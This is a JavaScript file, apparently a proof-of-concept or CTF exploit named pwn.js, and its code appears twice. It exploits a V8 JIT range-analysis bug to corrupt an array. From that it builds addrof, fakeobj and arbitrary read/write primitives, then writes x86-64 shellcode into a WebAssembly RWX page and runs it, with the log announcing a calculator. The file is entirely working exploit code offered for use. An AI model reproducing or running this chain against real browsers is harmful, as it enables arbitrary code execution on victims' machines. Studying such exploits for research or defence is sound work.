KaoRz/pwn.js

## pwn.js
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val, size) {
    f64_buf[0] = val;
    if(size == 32) {
        return BigInt(u64_buf[0]);
    } else if(size == 64) {
        return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
    }
}

function itof(val, size) {
    if(size == 32) {
        u64_buf[0] = Number(val & 0xffffffffn);
    } else if(size == 64) {
        u64_buf[0] = Number(val & 0xffffffffn);
        u64_buf[1] = Number(val >> 32n);
    }

    return f64_buf[0];
}

function trigger(cond) {
    let x = NaN;

    if(cond)
        x = -Infinity;

    var value = Math.abs(x);
    value = Math.max(value, 0x100);     // [0x100, inf]
    value = -value;                     // [-inf, -0x100]
    value = Math.max(value, -0x101);    // [-0x101, -0x100]
    value = -value;                     // [0x100, 0x101]
    value -= 0x100;                     // [0x2, 0x3]

    value >>= 1;                        // NaN >> 1 = 0
    value += 10;

    var array = Array(value);
    array[0] = 1.1;
    return [array, 1337];
}

for(let i = 0; i <= 10000; i++) {
    trigger(true);
}

var aux_obj = {"a": 1}
var corr_array = trigger(false)[0];
var aux_obj_arr = [aux_obj];
var aux_float_arr = [1.1, 2.2, 3.3];

var obj_arr_map = ftoi(corr_array[0x0f], 64) >> 32n;
var flt_arr_map = ftoi(corr_array[0x18], 32);

console.log("[+] Object array map: 0x" + obj_arr_map.toString(16));
console.log("[+] Float array map: 0x" + flt_arr_map.toString(16));

function addrof(obj) {
    aux_obj_arr[0] = obj;
    corr_array[0x0f] = itof(flt_arr_map << 32n, 64);
    let addr = aux_obj_arr[0];
    corr_array[0x0f] = itof(obj_arr_map << 32n, 64);
    return ftoi(addr, 64);
}

function fakeobj(addr) {
    let backup = ftoi(corr_array[0x18], 64);
    let tmp_mem = (backup & 0xffffffff00000000n) + obj_arr_map;
    aux_float_arr[0] = itof(addr, 64);
    corr_array[0x18] = itof(tmp_mem, 64);
    let fake = aux_float_arr[0];
    corr_array[0x18] = itof(backup, 64);
    return fake;
}

var rw_helper = [itof(flt_arr_map, 64), 1.1, 2.2, 3.3];
var rw_helper_addr = addrof(rw_helper) & 0xffffffffn;

console.log("[+] Controlled RW helper address: 0x" + rw_helper_addr.toString(16));

function arb_read(addr) {
    let fake = fakeobj(rw_helper_addr + 0x20n);
    rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
    return ftoi(fake[0], 64);
}

function arb_write(addr, value) {
    let fake = fakeobj(rw_helper_addr + 0x20n);
    rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
    fake[0] = itof(value, 64);
}

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,
                               130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,
                               128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,
                               128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,
                               0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,0,11]);
var wasm_module = new WebAssembly.Module(wasmCode);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var pwn = wasm_instance.exports.main;

var wasm_instance_addr = addrof(wasm_instance) & 0xffffffffn;
var rwx = arb_read(wasm_instance_addr + 0x68n);

console.log("[+] Wasm instance address: 0x" + wasm_instance_addr.toString(16));
console.log("[+] RWX section address: 0x" + rwx.toString(16));

var arr_buf = new ArrayBuffer(0x100);
var dataview = new DataView(arr_buf);

var arr_buf_addr = addrof(arr_buf) & 0xffffffffn;;
var back_store_addr = arb_read(arr_buf_addr + 0x14n);

console.log("[+] ArrayBuffer address: 0x" + arr_buf_addr.toString(16));
console.log("[+] Back store pointer: 0x" + back_store_addr.toString(16));

arb_write(arr_buf_addr + 0x14n, rwx);

var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,
               0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,
               0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];

for (let i = 0; i < shellcode.length; i++) {
    dataview.setUint32(4 * i, shellcode[i], true);
}

console.log("[+] Spawning a calculator...");
pwn();
	var buf = new ArrayBuffer(8);
	var f64_buf = new Float64Array(buf);
	var u64_buf = new Uint32Array(buf);

	function ftoi(val, size) {
	f64_buf[0] = val;
	if(size == 32) {
	return BigInt(u64_buf[0]);
	} else if(size == 64) {
	return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
	}
	}

	function itof(val, size) {
	if(size == 32) {
	u64_buf[0] = Number(val & 0xffffffffn);
	} else if(size == 64) {
	u64_buf[0] = Number(val & 0xffffffffn);
	u64_buf[1] = Number(val >> 32n);
	}

	return f64_buf[0];
	}

	function trigger(cond) {
	let x = NaN;

	if(cond)
	x = -Infinity;

	var value = Math.abs(x);
	value = Math.max(value, 0x100); // [0x100, inf]
	value = -value; // [-inf, -0x100]
	value = Math.max(value, -0x101); // [-0x101, -0x100]
	value = -value; // [0x100, 0x101]
	value -= 0x100; // [0x2, 0x3]

	value >>= 1; // NaN >> 1 = 0
	value += 10;

	var array = Array(value);
	array[0] = 1.1;
	return [array, 1337];
	}

	for(let i = 0; i <= 10000; i++) {
	trigger(true);
	}

	var aux_obj = {"a": 1}
	var corr_array = trigger(false)[0];
	var aux_obj_arr = [aux_obj];
	var aux_float_arr = [1.1, 2.2, 3.3];

	var obj_arr_map = ftoi(corr_array[0x0f], 64) >> 32n;
	var flt_arr_map = ftoi(corr_array[0x18], 32);

	console.log("[+] Object array map: 0x" + obj_arr_map.toString(16));
	console.log("[+] Float array map: 0x" + flt_arr_map.toString(16));

	function addrof(obj) {
	aux_obj_arr[0] = obj;
	corr_array[0x0f] = itof(flt_arr_map << 32n, 64);
	let addr = aux_obj_arr[0];
	corr_array[0x0f] = itof(obj_arr_map << 32n, 64);
	return ftoi(addr, 64);
	}

	function fakeobj(addr) {
	let backup = ftoi(corr_array[0x18], 64);
	let tmp_mem = (backup & 0xffffffff00000000n) + obj_arr_map;
	aux_float_arr[0] = itof(addr, 64);
	corr_array[0x18] = itof(tmp_mem, 64);
	let fake = aux_float_arr[0];
	corr_array[0x18] = itof(backup, 64);
	return fake;
	}

	var rw_helper = [itof(flt_arr_map, 64), 1.1, 2.2, 3.3];
	var rw_helper_addr = addrof(rw_helper) & 0xffffffffn;

	console.log("[+] Controlled RW helper address: 0x" + rw_helper_addr.toString(16));

	function arb_read(addr) {
	let fake = fakeobj(rw_helper_addr + 0x20n);
	rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
	return ftoi(fake[0], 64);
	}

	function arb_write(addr, value) {
	let fake = fakeobj(rw_helper_addr + 0x20n);
	rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
	fake[0] = itof(value, 64);
	}

	var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,
	130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,
	128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,
	128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,
	0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,0,11]);
	var wasm_module = new WebAssembly.Module(wasmCode);
	var wasm_instance = new WebAssembly.Instance(wasm_module);
	var pwn = wasm_instance.exports.main;

	var wasm_instance_addr = addrof(wasm_instance) & 0xffffffffn;
	var rwx = arb_read(wasm_instance_addr + 0x68n);

	console.log("[+] Wasm instance address: 0x" + wasm_instance_addr.toString(16));
	console.log("[+] RWX section address: 0x" + rwx.toString(16));

	var arr_buf = new ArrayBuffer(0x100);
	var dataview = new DataView(arr_buf);

	var arr_buf_addr = addrof(arr_buf) & 0xffffffffn;;
	var back_store_addr = arb_read(arr_buf_addr + 0x14n);

	console.log("[+] ArrayBuffer address: 0x" + arr_buf_addr.toString(16));
	console.log("[+] Back store pointer: 0x" + back_store_addr.toString(16));

	arb_write(arr_buf_addr + 0x14n, rwx);

	var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,
	0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,
	0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];

	for (let i = 0; i < shellcode.length; i++) {
	dataview.setUint32(4 * i, shellcode[i], true);
	}

	console.log("[+] Spawning a calculator...");
	pwn();